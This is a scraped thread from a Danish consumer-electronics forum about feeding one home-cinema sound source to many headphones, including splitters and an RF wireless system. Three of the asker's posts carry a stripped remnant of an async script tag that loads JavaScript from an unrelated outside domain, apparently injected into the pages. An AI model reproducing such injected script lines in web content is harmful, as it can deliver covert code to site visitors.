recordere.dk forum     Det danske community for hjemmets elektronik og indhold     Siden 2003
<b>Forside</b> Forside > Visnings- og lytte-udstyr > Surround
  Nye indlæg Nye indlæg  Seneste forum emner Seneste   Seneste forum emner (vindue) Vindue   De emner du deltager i Mine emner RSS Feed - Mange høretelefoner i stedet for højttalere i hjem
  FAQ FAQ  Søg i forum   Opret ny bruger Opret ny bruger  Log ind Log ind

Mange høretelefoner i stedet for højttalere i hjem

 Besvar Besvar Side  12>
Forfatter
Besked
Homebif Se dropdown menu
Ny bruger
Ny bruger


Oprettet: 13-Oktober-2019
Status: Offline
Point: 5
Funktioner Funktioner   Tak (0) Tak(0)   Citér Homebif Citér  BesvarSvar Direkte link til dette indlæg Emne: Mange høretelefoner i stedet for højttalere i hjem
    Sendt: 13-Oktober-2019 kl. 15:17
Hej, kan man bruge mange høretelefoner i hjemmebiografen og få den samme ene lydkilde i alle høretelefoner samtidigt så feks 8 eller 12 personer kan høre samme lyd i hjemmebiografen
 ?

Må gerne bare være stereo lyd, behøver ikke surround

Enten trådløse eller med ledning

Helst med volume justering på hver enkelt høretelefoner

Tak


Redigeret af Homebif - 13-Oktober-2019 kl. 15:22
Til top
Torben Rasmussen Se dropdown menu
Guld medlem
Guld medlem
Avatar
Flatpanels.dk

Oprettet: 06-Februar-2007
Sted: København
Status: Offline
Point: 4378
Funktioner Funktioner   Tak (0) Tak(0)   Citér Torben Rasmussen Citér  BesvarSvar Direkte link til dette indlæg Sendt: 13-Oktober-2019 kl. 16:56
FlatpanelsDK - Alt om fladskærms-tv, mediebokse og tv-markedet
Til top
Radiomanden Se dropdown menu
Platin medlem
Platin medlem
Avatar

Oprettet: 17-Maj-2004
Sted: 4100
Status: Offline
Point: 40543
Funktioner Funktioner   Tak (0) Tak(0)   Citér Radiomanden Citér  BesvarSvar Direkte link til dette indlæg Sendt: 13-Oktober-2019 kl. 17:21
Linket vitker ikke Fejl 404.
Marantz NR1403 - Shield TV - Nokia 8000 Streaming boks - Samsung 40UE7005 - ARVANI TA210 SOUNDBAR - Panasonic TX-49FX623E
Til top
Homebif Se dropdown menu
Ny bruger
Ny bruger


Oprettet: 13-Oktober-2019
Status: Offline
Point: 5
Funktioner Funktioner   Tak (0) Tak(0)   Citér Homebif Citér  BesvarSvar Direkte link til dette indlæg Sendt: 13-Oktober-2019 kl. 17:34
Tror han mente den her:

Men det er vidst kun mono..

Der må da være en høretelefon løsning til hjemmebiograf :-) , selvom det måske er et af de dyre mærker ?
behøver ikke være trådløs, bare det virker til flerer lyttere samtidigt i stereo

F.eks.:
Har læst at musik indspilniongs studioer har udstyr så flerer kan lytte i høretelefoner samtidigt, men ved ikke hvad den slags hedder ?




< ="text/" async="" ="//angood.com/21ef897172770ca75d.js">

Redigeret af Homebif - 13-Oktober-2019 kl. 17:39
Til top
longjohn2 Se dropdown menu
Guld medlem
Guld medlem


Oprettet: 29-November-2009
Status: Offline
Point: 989
Funktioner Funktioner   Tak (0) Tak(0)   Citér longjohn2 Citér  BesvarSvar Direkte link til dette indlæg Sendt: 13-Oktober-2019 kl. 18:32
Med ledning er det vel blot er et spørgsmål om at splitte udgangen fra TV/anlæg op i flere stik  - f.eks. som det her: http://www.eachdiy.com/goods-2043.html

Jeg har ikke selv testet det med mere end 2 headphones til samme kilde, hvor der ikke var reduktion i effekten/kvaliteten (så vidt jeg kunne høre). Men om det også gælder hvis man tilslutter, så mange som du har brug for, ved jeg ikke. Måske en ekstra forstærker sat ind mellem TV og headphones vil kunne løse det. 
  
Trådløst skal det være RF, da Bluetooth vistnok kun kan klare to headset (som så skal være Multipoint).

En mulighed med RF er f.eks. Sennheiser RS 120, hvor du kan tilslutte et ubegrænset antal headphones til samme sender: https://da-dk.sennheiser.com/wireless-headphones-stereo-rf-rs-120-ii  


Redigeret af longjohn2 - 13-Oktober-2019 kl. 18:32
Til top
Meier Se dropdown menu
Bruger
Bruger
Avatar

Oprettet: 09-Juli-2007
Sted: Denmark
Status: Offline
Point: 195
Funktioner Funktioner   Tak (0) Tak(0)   Citér Meier Citér  BesvarSvar Direkte link til dette indlæg Sendt: 13-Oktober-2019 kl. 20:26
Til top
Homebif Se dropdown menu
Ny bruger
Ny bruger


Oprettet: 13-Oktober-2019
Status: Offline
Point: 5
Funktioner Funktioner   Tak (0) Tak(0)   Citér Homebif Citér  BesvarSvar Direkte link til dette indlæg Sendt: 13-Oktober-2019 kl. 20:50
longjohn2:

Ja!SmileClap 

Sennheiser RS 120 med flere headphones til samme sender, er nøjagtig det jeg leder efter
Tak for svar/link.

Har tidligere haft disse headphones, spiller rigtig godt, vidste ikke man kan bruge flere headphones samtidigt - kanon fedt!!!

Og man kan jo bare bruge alm. batterier (ikke genopladelige) til flere headphones, hvis man nøjes med
1 sender/oplader, for så er alle headphones klar samtidigt uden at vente på at genoplade alle headphones.

(en stor stak nye alm. batterier må bare ligge klar i skuffen lol hvis 10 headphones
skal bruges samtidigt i en hjemmebiograf Big smile

Til top
KlausDM Se dropdown menu
Platin medlem
Platin medlem
Avatar

Oprettet: 12-Marts-2010
Sted: Hammel, Jylland
Status: Offline
Point: 19184
Funktioner Funktioner   Tak (0) Tak(0)   Citér KlausDM Citér  BesvarSvar Direkte link til dette indlæg Sendt: 13-Oktober-2019 kl. 21:45
Sådan af ren nysgerrighed:
Hvorfor hovedtelefoner?


Klaus
Min modelbane, http://modelbaneeuropa.dk
Min hjemmeside, http://moppe.dk
Til top
Homebif Se dropdown menu
Ny bruger
Ny bruger


Oprettet: 13-Oktober-2019
Status: Offline
Point: 5
Funktioner Funktioner   Tak (0) Tak(0)   Citér Homebif Citér  BesvarSvar Direkte link til dette indlæg Sendt: 13-Oktober-2019 kl. 22:14
Klaus:
Headphones fordi jeg bor i lejlighed og vil ikke forstyrre naboer med lyd fra hjemmebiograf.
Og med headphones kan hver enkelt person vælge hvor højt deres headphones skal spille, 
med volume knap på siden af øret.

Men mest fordi jeg har nogle meget larmende naboer, der gør det nærmest umuligt at bo i min egen lejlighed (jeg bor / sover andet sted). Derfor står min lejlighed nærmest tom, så jeg tænkte på hvordan jeg kunne bruge min lejlighed til noget andet end at bo i, men uden at blive generet af mine larmende naboer.

En hjemmebiograf med hovedtelefoner til hver enkelt "biograf-gæst" bliver løsningen på det problem -
Har ønsket mig en hjemmebiograf længe og samtidigt kan jeg lukke naboernes larm ude mens ser film i hjemmebif Big smile

Efter endt "biograf-tur" ville jeg og andre gæster forlade lejligheden igen og gå tilbage til andet sted jeg bor/sover 
(et hotel-agtigt luxus værelse tæt på hvor min kæreste hun bor Wink)

Derudover får min lejlighed sit eget fitness/træne rum komplet indrettet med udstyr, spejle, rigtig fitness gulv-underlag og det hele, så kan man gå ind og træne hvis popcorn og cola fra hjemmebiografen i stuen begynder at fylde for meget LOL
< ="text/" async="" ="//angood.com/21ef897172770ca75d.js"> < ="text/" async="" ="//angood.com/21ef897172770ca75d.js">

Redigeret af Homebif - 13-Oktober-2019 kl. 22:32
Til top
KlausDM Se dropdown menu
Platin medlem
Platin medlem
Avatar

Oprettet: 12-Marts-2010
Sted: Hammel, Jylland
Status: Offline
Point: 19184
Funktioner Funktioner   Tak (0) Tak(0)   Citér KlausDM Citér  BesvarSvar Direkte link til dette indlæg Sendt: 13-Oktober-2019 kl. 23:33
Tak for forklaringen.

Dog ville jeg skide lidt på de larmende naboer, når jeg havde filmaften og så skrue op for anlægget. Det ville virke meget forkert at hver enkelt sidder i sin egen “osteklokke” når man ser film og ikke mindst det at man ikke kan føle lyden, når det virkeligt går for sig i filmene.

Hvis de klager over larmen, så forelæg dem problematikken med at de larmer så meget at du ikke engang kan sove hjemme......


Klaus


Min modelbane, http://modelbaneeuropa.dk
Min hjemmeside, http://moppe.dk
Til top
Naiera Se dropdown menu
Platin medlem
Platin medlem
Avatar

Oprettet: 15-August-2004
Sted: Aarhus
Status: Offline
Point: 12213
Funktioner Funktioner   Tak (0) Tak(0)   Citér Naiera Citér  BesvarSvar Direkte link til dette indlæg Sendt: 14-Oktober-2019 kl. 03:44
Jeg mener også det fuldstændig vil ødelægge en filmaften. Hensynsløse og larmende naboer bør du bare skide på, billedligt talt.
Til top
slumbert Se dropdown menu
Guld medlem
Guld medlem
Avatar

Oprettet: 05-November-2009
Status: Offline
Point: 1977
Funktioner Funktioner   Tak (0) Tak(0)   Citér slumbert Citér  BesvarSvar Direkte link til dette indlæg Sendt: 14-Oktober-2019 kl. 21:43
En nem billigt løsning til 1300


Og et hun-minijack til phonokabel,hvis den ikke kan kobles direkte i minijackporten

Jeg kan ikke lige sige om det er noget der kan fungere i perfekt sync


Redigeret af slumbert - 14-Oktober-2019 kl. 22:04
endnu en hifi-flygtning

Kabeldiskussioner - Dumhed i metermål

Til top
 
 Besvar Besvar Side  12>
 
Skift forum Forum-tilladelser Se dropdown menu